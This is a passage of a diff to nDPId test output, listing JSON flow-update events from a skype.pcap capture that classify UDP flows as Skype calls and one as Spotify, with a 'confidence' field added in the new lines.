-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00678{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969668503,"flow_last_seen":1431969758516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2792,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969761262,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
